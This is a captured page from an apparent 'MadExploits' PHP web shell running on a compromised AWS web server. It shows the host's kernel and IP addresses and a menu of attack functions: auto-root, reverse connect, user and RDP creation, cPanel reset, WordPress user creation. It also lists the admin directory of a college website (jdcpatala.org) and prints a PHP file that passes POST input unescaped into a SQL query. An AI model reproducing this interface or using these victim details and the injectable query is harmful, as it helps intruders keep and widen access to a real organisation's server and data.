Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.134.92.193
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
np_admin /
[ HOME SHELL ]
Name
Size
Permission
Action
SpryAssets
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
Logout.php
84
B
-rw-r--r--
Session_Update.php
2.58
KB
-rw-r--r--
User_Account.php
12.6
KB
-rw-r--r--
User_Profile.php
8.57
KB
-rw-r--r--
User_Profile_permmion.php
14.71
KB
-rw-r--r--
admin_home.php
2
KB
-rw-r--r--
admin_home_old.php
10.92
KB
-rw-r--r--
attand.php
9.14
KB
-rw-r--r--
college_profile.php
8.56
KB
-rw-r--r--
college_profile_edit.php
7.15
KB
-rw-r--r--
committee_member.php
9.53
KB
-rw-r--r--
committee_member_edit.php
7.74
KB
-rw-r--r--
committee_name.php
7.26
KB
-rw-r--r--
connection.php
177
B
-rw-r--r--
courses.php
8.14
KB
-rw-r--r--
courses_edit.php
6.64
KB
-rw-r--r--
databasebackup.php
3.58
KB
-rw-r--r--
databaserestore.php
2.65
KB
-rw-r--r--
error_log
1.36
KB
-rw-r--r--
foragte_password.php
307
B
-rw-r--r--
gallery.php
8.79
KB
-rw-r--r--
gallery_edit.php
6.94
KB
-rw-r--r--
index.php
2.4
KB
-rw-r--r--
login_2.php
18.94
KB
-rw-r--r--
new_notice.php
9.16
KB
-rw-r--r--
non_teaching.php
10.16
KB
-rw-r--r--
non_teaching_edit.php
8.21
KB
-rw-r--r--
principal_message.php
8.96
KB
-rw-r--r--
principal_message_edit.php
7.35
KB
-rw-r--r--
splash_view.php
7.33
KB
-rw-r--r--
teaching.php
10.14
KB
-rw-r--r--
teaching_edit.php
8.2
KB
-rw-r--r--
teching_edit.php
8.17
KB
-rw-r--r--
tender.php
8.69
KB
-rw-r--r--
update_and_delete.php
4.1
KB
-rw-r--r--
update_attand.php
6.89
KB
-rw-r--r--
update_notice.php
6.9
KB
-rw-r--r--
user_details.php
9.24
KB
-rw-r--r--
user_reg.php
4.26
KB
-rw-r--r--
validateuser.php
685
B
-rw-r--r--
view_notice.php
1.14
KB
-rw-r--r--
welcome.php
821
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User_Profile_permmion.php
<?php ob_start(); session_start(); include("includes/connection.php"); include_once("includes/function.inc.php"); error_reporting(4); validateUser(); if($_REQUEST["Submit"]!="") { extract($_POST); //echo "select * from user where UserId='".$_POST["UserId"]."'"; $Userprofile=mysql_query("select * from user where UserId='".$_POST["UserId"]."'"); $RowResultUser=mysql_fetch_assoc($Userprofile); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title><?php echo $title; ?></title> <link href="css/mystyle.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="outer"> <?php include("includes/header.inc.php"); ?> <div class="page"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="400" align="center" valign="middle"><table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" class="table-border"> <tr> <td class="tble-heading" colspan="2">User Profile</td> </tr> <tr> <td width="87%"> </td> <td width="13%"> </td> </tr> <tr> <td colspan="2" align="center"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><div class="tab-heading">User's Preferences</div></td> </tr> <tr> <td align="center" class="tble-cntent"><form id="form1" name="form1" method="post" action=""> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="content"> <tr> <td height="79" align="center" valign="middle"><table width="55%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="28%" align="left" valign="middle"><strong>SELECT USER NAME </strong></td> <td width="51%" align="left" valign="middle"> <?php $QueryReport=mysql_query("select * from user "); ?> <select name="UserId" class="txtbox" id="UserId"> <option value="">Select User</option> <?php while($RowResult=mysql_fetch_assoc($QueryReport)) { if($RowResult["UserId"]==$_POST["UserId"]) { ?> <option value="<?php echo $RowResult["UserId"];?>" selected="selected"><?php echo $RowResult["UserName"];?></option> <?php } else {?> <option value="<?php echo $RowResult["UserId"];?>"><?php echo $RowResult["UserName"];?></option> <?php } ?> <?php } ?> </select> </td> <td width="21%" align="center" valign="middle"> <input name="Submit" type="submit" class="sbt-btn" value="Submit" /></td> </tr> </table></td> </tr> <tr> <?php if(mysql_num_rows($Userprofile)>0) { ?> <td height="25" align="center"><div class="box"> <p> Master Menu </p> <div class="sml-box"> <?php $ch1 = 'checked'; $ch2 = 'unchecked'; ?> <input type="checkbox" name="AddCompany" id="AddCompany" value="Add Company" <?php if($RowResultUser['AddCompany']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add company <br /> <input type="checkbox" name="AddVendor" id="AddVendor" value="Add Vendor" <?php if($RowResultUser['AddVendor']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add Vendor <br /> <input type="checkbox" name="AddShop" id="AddShop" value="Add Shop" <?php if($RowResultUser['AddShop']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add Shop <br /> <input type="checkbox" name="AddSize" id="AddSize" value="Add Size" <?php if($RowResultUser['AddSize']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add Size <br /> <input type="checkbox" name="AddColor" id="AddColor" value="Add Color" <?php if($RowResultUser['AddColor']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add Color <br /> <input type="checkbox" name="AddItem" id="AddItem" value="Add Item" <?php if($RowResultUser['AddItem']!="") { echo $ch1; } else { echo $ch2; } ?> /> Add Item <br /> <input type="checkbox" name="BillHead " id="BillHead " value="Bill Head" <?php if($RowResultUser['BillHead']!="") { echo $ch1; } else { echo $ch2; } ?> /> Bill Head </div> </div> <div class="box2"> <p>Transaction Menu </p> <div class="sml-box"> <input type="checkbox" name="CreatePurchaseorder" id="CreatePurchaseorder" value="Create Purchase order" <?php if($RowResultUser['CreatePurchaseorder']!="") { echo $ch1; } else { echo $ch2; } ?> /> Create Purchase order <br /> <input type="checkbox" name="ModifyPurchaseorder" id="ModifyPurchaseorder" value="Modify Purchase order" <?php if($RowResultUser['ModifyPurchaseorder']!="") { echo $ch1; } else { echo $ch2; } ?> /> Modify Purchase order <br /> <input type="checkbox" name="ReceivedMaterial" id="ReceivedMaterial" value="Received Material" <?php if($RowResultUser['ReceivedMaterial']!="") { echo $ch1; } else { echo $ch2; } ?> /> Received Material <br /> <input type="checkbox" name="TransferMaterial" id="TransferMaterial" value="Transfer Material" <?php if($RowResultUser['TransferMaterial']!="") { echo $ch1; } else { echo $ch2; } ?> /> Transfer Material <br /> <input type="checkbox" name="SaleItem" id="SaleItem" value="Sale Item" <?php if($RowResultUser['SaleItem']!="") { echo $ch1; } else { echo $ch2; } ?> /> Sale Item <br /> <input type="checkbox" name="ConvertRawToFinishingGoods" id="ConvertRawToFinishingGoods" <?php if($RowResultUser['ConvertRawToFinishingGoods']!="") { echo $ch1; } else { echo $ch2; } ?> value="Convert Raw to Finishing Goods" /> Convert Raw to Finishing Goods <br /> <input type="checkbox" name="ReceivedFinishingGoods" id="ReceivedFinishingGoods" value="Received Finishing Goods" <?php if($RowResultUser['ReceivedFinishingGoods']!="") { echo $ch1; } else { echo $ch2; } ?> /> Received Finishing Goods <br /> <input type="checkbox" name="ModifyFinishingGoods" id="ModifyFinishingGoods" value="Modify Finishing Goods" <?php if($RowResultUser['ModifyFinishingGoods']!="") { echo $ch1; } else { echo $ch2; } ?> /> Modify Finishing Goods <br /> <input type="checkbox" name="ModifyBills" id="ModifyBills" value="Modify Bills" <?php if($RowResultUser['ModifyBills']!="") { echo $ch1; } else { echo $ch2; } ?> /> Modify Bills </div> </div> <div class="box"> <p>Reporting Menu</p> <div class="sml-box"> <input type="checkbox" name="TransactionReport" id="TransactionReport" <?php if($RowResultUser['TransactionReport']!="") { echo $ch1; } else { echo $ch2; } ?> value="Transaction Report" /> Transaction Report <br /> <input type="checkbox" name="POReport" id="POReport" value="PO Report" <?php if($RowResultUser['POReport']!="") { echo $ch1; } else { echo $ch2; } ?> /> PO Report <br /> <input type="checkbox" name="ChallanReport" id="ChallanReport" value="Challan Report" <?php if($RowResultUser['ChallanReport']!="") { echo $ch1; } else { echo $ch2; } ?> /> Challan Report <br /> <input type="checkbox" name="TaxReport" id="TaxReport" value="Tax Report" <?php if($RowResultUser['TaxReport']!="") { echo $ch1; } else { echo $ch2; } ?> /> Tax Report <br /> <input type="checkbox" name="RawStock" id="RawStock" value="Raw Stock" <?php if($RowResultUser['RawStock']!="") { echo $ch1; } else { echo $ch2; } ?> /> Raw Stock <br /> <input type="checkbox" name="FinishGoodStock" id="FinishGoodStock" <?php if($RowResultUser['FinishGoodStock']!="") { echo $ch1; } else { echo $ch2; } ?> value="FinishGood Stock" /> FinishGood Stock <br /> <input type="checkbox" name="ConsumableStock" id="ConsumableStock" <?php if($RowResultUser['ConsumableStock']!="") { echo $ch1; } else { echo $ch2; } ?> value="Consumable Stock" /> Consumable Stock <br /> <input type="checkbox" name="GenerateBill" id="GenerateBill" <?php if($RowResultUser['GenerateBill']!="") { echo $ch1; } else { echo $ch2; } ?> value="Generate Bill" /> Generate Bill </div> </div> <div class="box"> <p> Barcode Menu </p> <div class="sml-box"> <input type="checkbox" name="BarcodeGenerate" id="BarcodeGenerate" <?php if($RowResultUser['BarcodeGenerate']!="") { echo $ch1; } else { echo $ch2; } ?> value="Barcode Generate" /> Barcode Generate </div> </div> <div class="box"> <p> Data Append </p> <div class="sml-box"> <input type="checkbox" name="Transfer" id="Transfer" value="Transfer" <?php if($RowResultUser['Transfer']!="") { echo $ch1; } else { echo $ch2; } ?> /> Transfer <br /> <input type="checkbox" name="Update" id="Update" value="Update" <?php if($RowResultUser['Update1']!="") { echo $ch1; } else { echo $ch2; } ?> /> Update <br /> <input type="checkbox" name="ItemTransfer" id="ItemTransfer" <?php if($RowResultUser['ItemTransfer']!="") { echo $ch1; } else { echo $ch2; } ?> value="Item Transfer" /> Item Transfer <br /> <input type="checkbox" name="ItemUpdate" id="ItemUpdate" value="Item Update" <?php if($RowResultUser['ItemUpdate']!="") { echo $ch1; } else { echo $ch2; } ?> /> Item Update <br /> </div> </div></td> </tr> <?php } ?> </table> </form> </td> </tr> <tr> <td> </td> </tr> </table> </td> </tr> <tr> <td height="50"> </td> <td><div class="exit"><a href="welcome.php">Exit</a></div></td> </tr> </table></td> </tr> </table> </div> <?php include("includes/footer.inc.php"); ?> <script type="text/javascript"> var TabbedPanels1 = new Spry.Widget.TabbedPanels("TabbedPanels1"); </script> </div> </body> </html>
Close